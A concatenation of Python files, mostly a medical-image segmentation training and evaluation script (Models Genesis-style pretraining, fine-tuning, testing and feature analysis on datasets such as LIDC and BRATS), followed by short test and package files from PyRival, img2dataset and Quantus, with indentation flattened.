dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create different task dirs, e.g. [lidc, brats] vs [brats, lidc]
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="", task="FROM_SCRATCH{}".format(datasets_used_str), self_supervised=False, supervised=True, model=kwargs_dict_["model"]
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_sup = True
config.display()
trainer = Trainer(config, dataset)
trainer.load_model(from_latest_checkpoint=True, in_channels=kwargs_dict_["in_channels"], out_channels=kwargs_dict_["out_channels"])
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
"""
---
"""
def train_from_scratch_on_dataset_with_ss(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create different task dirs, e.g. [lidc, brats] vs [brats, lidc]
split = kwargs_dict_.get("split", (0.8, 0.2, 0))
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="", task="FROM_SCRATCH{}".format(datasets_used_str), self_supervised=True, supervised=True, model=kwargs_dict_["model"]
)
replace_config_param_attributes(config, kwargs_dict_)
config.from_scratch = True # Redundant, just for logging purposes
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# to "lose" the used splits (they are popped), the updated cross validator must be saved back into the run-1 objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer = Trainer(config, dataset)
trainer.load_model(from_scratch=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True) # here it's already loading from the dir of the task
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
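The helpers above sort the dataset list before deriving the task directory name. A minimal sketch of why that matters, using a hypothetical helper name that is not part of this codebase:

```python
# Hypothetical helper: derive a task-directory suffix from the dataset list.
# Sorting a copy makes the name independent of the caller's ordering, so the
# same set of datasets always maps to the same task directory.
def task_dir_suffix(dataset_list):
    return "_".join(sorted(dataset_list))

# Both orderings produce the same suffix, hence the same task directory.
assert task_dir_suffix(["lidc", "brats"]) == task_dir_suffix(["brats", "lidc"])
```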
def resume_train_from_scratch_on_dataset_with_ss(run_nr: int, **kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = kwargs_dict_["dataset"]
dataset_list.sort() # sort alphabetically: without a stable order the same datasets create a different task dir, e.g. ["lidc", "brats"] vs ["brats", "lidc"]
mode = kwargs_dict_.get("mode", "")
datasets_used_str = get_datasets_used_str(dataset_list, mode, two_dim_data=kwargs_dict_["two_dimensional_data"])
config = FineTuneConfig(
data_dir="", task="FROM_SCRATCH{}".format(datasets_used_str), self_supervised=True, supervised=True, model=kwargs_dict_["model"]
)
config.override_dirs(run_nr)
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
raise FileNotFoundError("Could not find CONFIG object pickle. Did you specify a valid run number?")
if os.path.isfile(os.path.join(config.object_dir, "dataset.pkl")):
dataset = load_object(os.path.join(config.object_dir, "dataset.pkl")) #!
else:
raise FileNotFoundError("Could not find DATASET object pickle. Did you specify a valid run number?")
replace_config_param_attributes(config, kwargs_dict_)
config.resume_sup = True
config.resume_ss = True
config.display()
trainer = Trainer(config, dataset)
completed_ss = trainer.ss_has_been_completed()
if not completed_ss:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_self_supervised()
trainer.load_model(from_latest_improvement_ss=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
else:
trainer.load_model(from_latest_checkpoint=True)
trainer.finetune_supervised()
trainer.add_hparams_to_writer()
trainer.get_stats()
def test(**kwargs):
from random import shuffle
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
enforce_test_again = kwargs_dict_["enforce_test_again"]
test_non_completed = kwargs_dict_["test_non_completed"]
mini_only = kwargs_dict_["mini_only"]
full_only = kwargs_dict_["full_only"]
task_dirs = get_task_dirs()
shuffle(task_dirs) # to have multiple metric collectors working
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name is not None:
if task_name not in task_dir:
# print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
# if not enforce_test_again:
# if not full_only:
# if task_dir_already_has_metric_dict_computed(task_dir) is True:
# print("\n\n SKIPPED TESTING WEIGHTS FROM AS IS ALREADY COMPUTED: ", task_dir)
# continue
# # only do full cubes after mini
# else:
# if task_dir_already_has_metric_dict_computed(task_dir) is False:
# print("\n\n SKIPPED FULL CUBES TESTING WEIGHTS AS MINI IS NOT YET COMPUTED: ", task_dir)
# continue
if "FROM_SCRATCH_BRAIN_UNET_ACS_SMALL_GN/only_supervised/run_2" in task_dir:
continue
if "_BRAIN_UNET_ACS_SMALL_GN_same_partition_batch_14" in task_dir:
continue
if "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG" in task_dir:
if "new_folder" in task_dir:
pass
else:
already_done = False
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
if already_done is True:
continue
if "run_1_copy" in task_dir:
continue
if "UNET_ACS_CLS_ONLY" in task_dir:
continue
if "cellari_heart_sup_2D_UNET_2D" in task_dir or "cellari_heart_sup_10_192_2D_UNET_2D" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
config_object = models_genesis_config(add_model_to_task=False)
config_object.override_dirs(int(task_dir[-1])) # NOTE: assumes a single-digit run number, e.g. ".../run_3"
if hasattr(config_object, "supervised") is False:
print("SKIPPING, no supervised attribute in config: \n", task_dir)
continue
if config_object.supervised is False:
print("SKIPPING, supervised is False in config: \n", task_dir)
# skip models that have not been fine-tuned for segmentation
continue
print("\n\n TESTING WEIGHTS FROM: ", task_dir)
if ("FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG" in config_object.model_path_save) or (
"FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG" in config_object.model_path_save
):
specific_weight_path_split = config_object.model_path_save.split("/")
specific_weight_path_split[1] = "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG"
specific_weight_path = "/".join(specific_weight_path_split)
config_object.model_path_save = specific_weight_path
checkpoint = torch.load(
os.path.join(config_object.model_path_save, "weights_sup.pt"),
map_location=torch.device("cuda" if torch.cuda.is_available() else "cpu"),
)
print("TEST NON COMPLETED", test_non_completed)
if test_non_completed is False:
if checkpoint.get("completed_sup", None) is not True:
print("SKIPPING AS SUP IS NOT COMPLETED YET FOR {}".format(config_object.model_path_save))
continue
dataset_object = get_dataset_object_of_task_dir(task_dir)
if dataset_object is None:
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.valid_fold]
x_test_filenames = [
"bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.test_fold
] # unclear what the test fold is used for upstream
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset_object = Dataset(
config_object.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is irrelevant here; it is overridden by file_names
tester = Tester(config_object, dataset_object)
if mini_only:
tester.test_segmentation_mini(enforce_test_again=enforce_test_again)
else:
raise ValueError("only --mini_only testing is currently supported; full-cube testing is disabled")
# elif full_only:
# tester.test_segmentation_full()
# else:
# tester.test_segmentation_mini()
# tester.test_segmentation_full()
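The FROM_PROVIDED_WEIGHTS skip logic above rewrites the first path component of a task dir to probe sibling task dirs for already-computed metrics. A small sketch of that split/replace/join pattern, with a hypothetical helper name:

```python
# Hypothetical helper mirroring the pattern above: swap the leading task-name
# component for each sibling task and return the candidate paths whose metric
# dicts should be checked.
def sibling_paths(task_dir, sibling_tasks):
    parts = task_dir.split("/")
    return ["/".join([task] + parts[1:]) for task in sibling_tasks]
```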
def save_images(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
enforce_test_again = kwargs_dict_["enforce_test_again"]
mini_only = kwargs_dict_["mini_only"]
full_only = kwargs_dict_["full_only"]
task_dirs = get_task_dirs()
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name is not None:
if task_name not in task_dir:
# print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG" in task_dir:
if "new_folder" in task_dir:
pass
else:
already_done = False
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
split = task_dir.split("/")
split[0] = "FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG"
path = "/".join(split)
if task_dir_already_has_metric_dict_computed(path):
already_done = True
if already_done is True:
continue
if "run_1_copy" in task_dir:
continue
if "UNET_ACS_CLS_ONLY" in task_dir:
continue
if "cellari_heart_sup_2D_UNET_2D" in task_dir or "cellari_heart_sup_10_192_2D_UNET_2D" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
config_object = models_genesis_config(add_model_to_task=False)
config_object.override_dirs(int(task_dir[-1])) # NOTE: assumes a single-digit run number, e.g. ".../run_3"
if hasattr(config_object, "supervised") is False:
print("SKIPPING, no supervised attribute in config: \n", task_dir)
continue
if config_object.supervised is False:
print("SKIPPING, supervised is False in config: \n", task_dir)
# skip models that have not been fine-tuned for segmentation
continue
print("\n\n TESTING WEIGHTS FROM: ", task_dir)
if ("FROM_PROVIDED_WEIGHTS_SUP_ONLY_lidc_VNET_MG" in config_object.model_path_save) or (
"FROM_PROVIDED_WEIGHTS_SS_AND_SUP_lidc_VNET_MG" in config_object.model_path_save
):
specific_weight_path_split = config_object.model_path_save.split("/")
specific_weight_path_split[1] = "FROM_PROVIDED_WEIGHTS_lidc_VNET_MG"
specific_weight_path = "/".join(specific_weight_path_split)
config_object.model_path_save = specific_weight_path
checkpoint = torch.load(
os.path.join(config_object.model_path_save, "weights_sup.pt"),
map_location=torch.device("cuda" if torch.cuda.is_available() else "cpu"),
)
if checkpoint.get("completed_sup", None) is not True:
print("SKIPPING AS SUP IS NOT COMPLETED YET FOR {}".format(config_object.model_path_save))
continue
dataset_object = get_dataset_object_of_task_dir(task_dir)
if dataset_object is None:
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.valid_fold]
x_test_filenames = [
"bat_32_s_64x64x32_" + str(i) + ".npy" for i in config_object.test_fold
] # unclear what the test fold is used for upstream
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset_object = Dataset(
config_object.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is irrelevant here; it is overridden by file_names
tester = Tester(config_object, dataset_object)
tester.save_segmentation_examples()
def extract_features(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_["layer"]
task_dirs = get_task_dirs()
print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
# print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "AXIS_AWARE_DECODER" in task_dir:
continue
if "CUSTOM_ACS_OUT_MODULES" in task_dir:
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError("no config object found for task dir: {}".format(task_dir))
print("\n\n EXTRACTING FEATURES FROM: ", task_dir)
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
feature_extractor.extract_features(layer)
def plot_features(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_.get("layer", None)
phase = kwargs_dict_["phase"]
skip_connections = kwargs_dict_["skip_connections"]
task_dirs = get_task_dirs()
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError("no config object found for task dir: {}".format(task_dir))
print("\n\n EXTRACTING FEATURES FROM: ", task_dir)
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
if skip_connections:
feature_extractor.plot_feature_maps_low_dimensional_space_skip_connections()
else:
feature_extractor.plot_feature_maps_on_low_dimensional_space(layer=layer, phase=phase)
# feature_extractor.save_means_and_variances_hist_kl(layer)
def distribution_stats(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_.get("layer", None)
skip_connections = kwargs_dict_["skip_connections"]
task_dirs = get_task_dirs()
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError("no config object found for task dir: {}".format(task_dir))
print("\n\n EXTRACTING FEATURES FROM: ", task_dir)
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
feature_extractor.save_means_and_variances_hist_kl(layer)
def distance_measure(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
task_name = kwargs_dict_["task_name"]
task_name_exact = kwargs_dict_["task_name_exact"]
layer = kwargs_dict_.get("layer", None)
skip_connections = kwargs_dict_["skip_connections"]
task_dirs = get_task_dirs()
phase = kwargs_dict_["phase"]
# print("TASK DIRS ", task_dirs)
for task_dir in task_dirs:
if task_name_exact is not None:
if task_name_exact != task_dir:
continue
if task_name is not None:
if task_name not in task_dir:
print("{} not in {}\n Continuing".format(task_name, task_dir))
continue
if "run_1_copy" in task_dir:
continue
config_object = get_config_object_of_task_dir(task_dir)
if config_object is None:
raise ValueError("no config object found for task dir: {}".format(task_dir))
dataset_object = get_dataset_object_of_task_dir(task_dir)
feature_extractor = FeatureExtractor(config_object, dataset_object)
feature_extractor.distance_measure(layer=layer, phase=phase)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--command", required=True, dest="command", type=str)
parser.add_argument("--run", required=False, dest="run", default=None, type=int)
parser.add_argument("-d", "--dataset", nargs="+", required=False, dest="dataset", default=[]) # python arg.py -l 1234 2345 3456 4567
parser.add_argument("--mode", required=False, dest="mode", default=None, type=str)
parser.add_argument(
"--directory",
required=False,
dest="directory",
type=str,
default=None,
help="Path to Model weights folder. E.g: pretrained_weights/GENESIS_REPLICATION_PRETRAIN_MODEL/run_5",
)
parser.add_argument("--split", nargs="+", required=False, dest="tr_val_ts_split", default=None, type=str)
parser.add_argument("--nb_epoch_ss", required=False, dest="nb_epoch_ss", type=int)
parser.add_argument("--nb_epoch_sup", required=False, dest="nb_epoch_sup", type=int)
parser.add_argument("-opt_ss", "--optimizer_ss", required=False, dest="optimizer_ss", type=str)
parser.add_argument("-sch_ss", "--scheduler_ss", required=False, dest="scheduler_ss", type=str)
parser.add_argument("-lr_ss", "--learning_rate_ss", required=False, dest="lr_ss", type=float)
parser.add_argument("--batch_size_ss", required=False, dest="batch_size_ss", type=int)
parser.add_argument("--patience_ss_terminate", required=False, dest="patience_ss_terminate", type=int)
parser.add_argument("--patience_ss", required=False, dest="patience_ss", type=int)
parser.add_argument("-opt_sup", "--optimizer_sup", required=False, dest="optimizer_sup", type=str)
parser.add_argument("-sch_sup", "--scheduler_sup", required=False, dest="scheduler_sup", type=str)
parser.add_argument("-lr_sup", "--learning_rate_sup", required=False, dest="lr_sup", type=float)
parser.add_argument("--batch_size_sup", required=False, dest="batch_size_sup", type=int)
parser.add_argument("--patience_sup_terminate", required=False, dest="patience_sup_terminate", type=int)
parser.add_argument("--patience_sup", required=False, dest="patience_sup", type=int)
parser.add_argument("--loss_function_sup", required=False, dest="loss_function_sup", type=str)
parser.add_argument("--introduce_surrogate_at_epoch", required=False, dest="introduce_surrogate_at_epoch", type=int, default=0)
parser.add_argument("--surrogate_loss_weight", required=False, dest="surrogate_loss_weight", type=float)
parser.add_argument("--save_model_every_n_epochs", required=False, dest="save_model_every_n_epochs", type=int, default=0)
parser.add_argument("--model", required=False, default="VNET_MG", dest="model", type=str)
parser.add_argument("--in_channels", required=False, dest="in_channels", type=int, default=1)
parser.add_argument("--out_channels", required=False, dest="out_channels", type=int, default=1)
parser.add_argument("--task_name", required=False, dest="task_name", type=str, default=None)
parser.add_argument("--task_name_exact", required=False, dest="task_name_exact", type=str, default=None)
parser.add_argument("--num_cv_folds", dest="num_cv_folds", type=int, required=False, default=None)
parser.add_argument("--cv_fold", dest="cv_fold", action="store_true", required=False)
parser.add_argument("--two_dimensional_data", dest="two_dimensional_data", action="store_true", required=False)
parser.add_argument("--convert_to_acs", dest="convert_to_acs", action="store_true", required=False)
parser.add_argument("--new_folder", dest="new_folder", action="store_true", required=False)
parser.add_argument("--use_supervision_transforms", dest="use_supervision_transforms", action="store_true", required=False)
parser.add_argument(
"--make_acs_kernel_split_adaptive_to_input_dimensions",
dest="make_acs_kernel_split_adaptive_to_input_dimensions",
action="store_true",
required=False,
)
parser.add_argument("--data_limit_2d", dest="data_limit_2d", required=False, default=None, type=int)
parser.add_argument("--return_axis_index", dest="return_axis_index", required=False, action="store_true")
parser.add_argument("--advance_index_on", dest="advance_index_on", required=False, default=1, type=int)
parser.add_argument("--enforce_test_again", dest="enforce_test_again", action="store_true", required=False)
parser.add_argument("--test_non_completed", dest="test_non_completed", action="store_true", required=False)
parser.add_argument("--add_batch_size_to_task", dest="add_batch_size_to_task", action="store_true", required=False)
parser.add_argument("--add_to_task", dest="add_to_task", required=False, type=str, default="")
parser.add_argument("--phase", dest="phase", required=False, type=str, default="both")
parser.add_argument("--mini_only", dest="mini_only", action="store_true", required=False)
parser.add_argument("--full_only", dest="full_only", action="store_true", required=False)
parser.add_argument("--pool_features", dest="pool_features", action="store_true", required=False)
parser.add_argument("--layer", dest="layer", nargs="+", required=False, type=int, default=None)
parser.add_argument("--skip_connections", dest="skip_connections", required=False, action="store_true")
parser.add_argument("--encoder_depth", dest="encoder_depth", nargs="+", required=False, type=int)
parser.add_argument("--branch_arch", dest="branch_arch", type=str, required=False)
parser.add_argument("--branch_depth", dest="branch_depth", type=int, required=False)
parser.add_argument("--bridge_mode", dest="bridge_mode", type=str, required=False)
# fix_unsqueeze_order: when converting to ACS, the axial kernel is unsqueezed to (x, y, 1) and the sagittal one to (1, y, z); only relevant for ACS conversion
parser.add_argument("--fix_unsqueeze_order", dest="fix_unsqueeze_order", action="store_true", required=False)
args = parser.parse_args()
print(args)
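build_kwargs_dict is a project-specific helper not shown here; as a rough, hedged sketch, its common core likely resembles converting the parsed Namespace into a plain dict while dropping options that were left unset:

```python
import argparse

# Hedged sketch only: the real build_kwargs_dict adds project-specific logic
# (dataset resolution, split parsing, flags like get_directory); the shared
# core is turning the Namespace into a dict and dropping None-valued options.
def namespace_to_kwargs(ns):
    return {k: v for k, v in vars(ns).items() if v is not None}

# Demo names (demo_parser, demo_args) avoid clashing with the real parser.
demo_parser = argparse.ArgumentParser()
demo_parser.add_argument("--run", type=int, default=None)
demo_parser.add_argument("--model", type=str, default="VNET_MG")
demo_args = demo_parser.parse_args(["--model", "UNET_2D"])
# --run was not given, so it is dropped; --model keeps its parsed value.
assert namespace_to_kwargs(demo_args) == {"model": "UNET_2D"}
```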
if args.command == "replicate_model_genesis_pretrain":
print("STARTING REPLICATION OF RESULTS EXPERIMENT")
kwargs_dict = build_kwargs_dict(args)
replication_of_results_pretrain(kwargs_dict=kwargs_dict)
elif args.command == "resume_model_genesis_pretrain":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args)
print("RESUMING REPLICATION OF RESULTS EXPERIMENT FROM RUN {}".format(args.run))
resume_replication_of_results_pretrain(args.run, kwargs_dict=kwargs_dict)
elif args.command == "replicate_acs_results_fcnresnet18_my_cubes":
kwargs_dict = build_kwargs_dict(args, get_dataset=False, search_for_split=False)
assert kwargs_dict["model"] is not None and kwargs_dict["model"].lower() != "vnet_mg"
replicate_acs_results_fcnresnet18_my_cubes(kwargs_dict=kwargs_dict)
elif args.command == "resume_replicate_acs_results_fcnresnet18_my_cubes":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=False, search_for_split=False)
assert kwargs_dict["model"] is not None and kwargs_dict["model"].lower() != "vnet_mg"
resume_replicate_acs_results_fcnresnet18_my_cubes(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "replicate_acs_results_fcnresnet18_their_cubes":
kwargs_dict = build_kwargs_dict(args, get_dataset=False, search_for_split=False)
assert kwargs_dict["model"] is not None and kwargs_dict["model"].lower() != "vnet_mg"
replicate_acs_results_fcnresnet18_their_cubes(kwargs_dict=kwargs_dict)
elif args.command == "finetune_from_provided_weights_no_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
use_provided_weights_and_finetune_on_dataset_without_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_provided_weights_no_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
print("RESUMING FINETUNE FROM PROVIDED WEIGHTS EXPERIMENT WITH NO SS FROM RUN {}".format(args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_provided_weights_and_finetune_on_dataset_without_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "finetune_from_provided_weights_with_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
use_provided_weights_and_finetune_on_dataset_with_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_provided_weights_with_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
print("RESUMING FINETUNE FROM PROVIDED WEIGHTS EXPERIMENT WITH SS FROM RUN {}".format(args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_provided_weights_and_finetune_on_dataset_with_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "pretrain_mg_framework":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
pretrain_mg_framework_specific_dataset(kwargs_dict=kwargs_dict)
elif args.command == "resume_pretrain_mg_framework":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
print("RESUMING PRETRAIN ACCORDING TO MG FRAMEWORK FROM RUN {}".format(args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_pretrain_mg_framework_specific_dataset(run_nr=args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "do_ss_from_model":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True, get_directory=True)
use_model_weights_and_do_self_supervision(kwargs_dict=kwargs_dict)
elif args.command == "resume_do_ss_from_model":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True, get_directory=True)
print("RESUMING SS FINETUNING FROM {} WEIGHTS SS FROM RUN {}".format(args.directory, args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_model_weights_and_do_self_supervision(args.run, kwargs_dict=kwargs_dict)
elif args.command == "finetune_from_model_no_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True, get_directory=True)
use_model_weights_and_finetune_on_dataset_without_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_model_no_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True, get_directory=True)
print("RESUMING FINETUNE FROM {} WEIGHTS NO SS FROM RUN {}".format(args.directory, args.run))
print("DATASET: {} // MODE: {}".format(kwargs_dict["dataset"], args.mode))
resume_use_model_weights_and_finetune_on_dataset_without_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "finetune_from_model_with_ss":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True, get_directory=True)
use_model_weights_and_finetune_on_dataset_with_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_finetune_from_model_with_ss":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True, get_directory=True)
resume_use_model_weights_and_finetune_on_dataset_with_ss(args.run, kwargs_dict=kwargs_dict)
"""
---
"""
elif args.command == "from_scratch_supervised":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
train_from_scratch_on_dataset_no_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_from_scratch_supervised":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
resume_train_from_scratch_on_dataset_no_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "from_scratch_ss_and_sup":
kwargs_dict = build_kwargs_dict(args, get_dataset=True, search_for_split=True)
train_from_scratch_on_dataset_with_ss(kwargs_dict=kwargs_dict)
elif args.command == "resume_from_scratch_ss_and_sup":
assert args.run is not None, "You have to specify which --run to resume (int)"
kwargs_dict = build_kwargs_dict(args, get_dataset=True)
resume_train_from_scratch_on_dataset_with_ss(run_nr=args.run, kwargs_dict=kwargs_dict)
elif args.command == "test":
kwargs_dict = build_kwargs_dict(args, test=True, search_for_params=False)
test(kwargs_dict=kwargs_dict)
elif args.command == "extract_features":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
extract_features(kwargs_dict=kwargs_dict)
elif args.command == "plot_features":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
plot_features(kwargs_dict=kwargs_dict)
elif args.command == "save_images":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
save_images(kwargs_dict=kwargs_dict)
elif args.command == "distribution":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
distribution_stats(kwargs_dict=kwargs_dict)
elif args.command == "distance":
kwargs_dict = build_kwargs_dict(args, search_for_params=False)
distance_measure(kwargs_dict=kwargs_dict)
else:
raise ValueError("Input a valid command")
# tests/algebra/test_sieve.py (tusshar2000/PyRival, Apache-2.0)
from pyrival.sieve import *
def test_prime_list(primes):
    assert primes == prime_list(primes[-1])
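prime_list comes from pyrival.sieve and is not shown here; for reference, a self-contained sieve of Eratosthenes with the contract the test assumes (all primes p <= n, in ascending order). The name sieve_primes is mine, not PyRival's:

```python
def sieve_primes(n):
    # Boolean sieve: is_prime[i] is True iff i is prime, for 0 <= i <= n.
    is_prime = [True] * (n + 1)
    is_prime[0:2] = [False, False]
    for p in range(2, int(n ** 0.5) + 1):
        if is_prime[p]:
            # Mark multiples of p starting at p*p; smaller ones are already marked.
            is_prime[p * p :: p] = [False] * len(range(p * p, n + 1, p))
    return [i for i in range(n + 1) if is_prime[i]]
```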
# img2dataset/__init__.py (kanttouchthis/img2dataset, MIT)
"""Img2dataset"""
from img2dataset.main import main
from img2dataset.main import download
# tests/metrics/test_randomisation_metrics.py (sebastian-lapuschkin/Quantus, MIT)
from typing import Union
import numpy as np
import pytest
from pytest_lazyfixture import lazy_fixture
from ..fixtures import *
from ...quantus.metrics import *
from ...quantus.helpers import *
from ...quantus.helpers.explanation_func import explain
from ...quantus.helpers.model_interface import ModelInterface
@pytest.mark.randomisation
@pytest.mark.parametrize(
"model,data,params,expected",
[
(
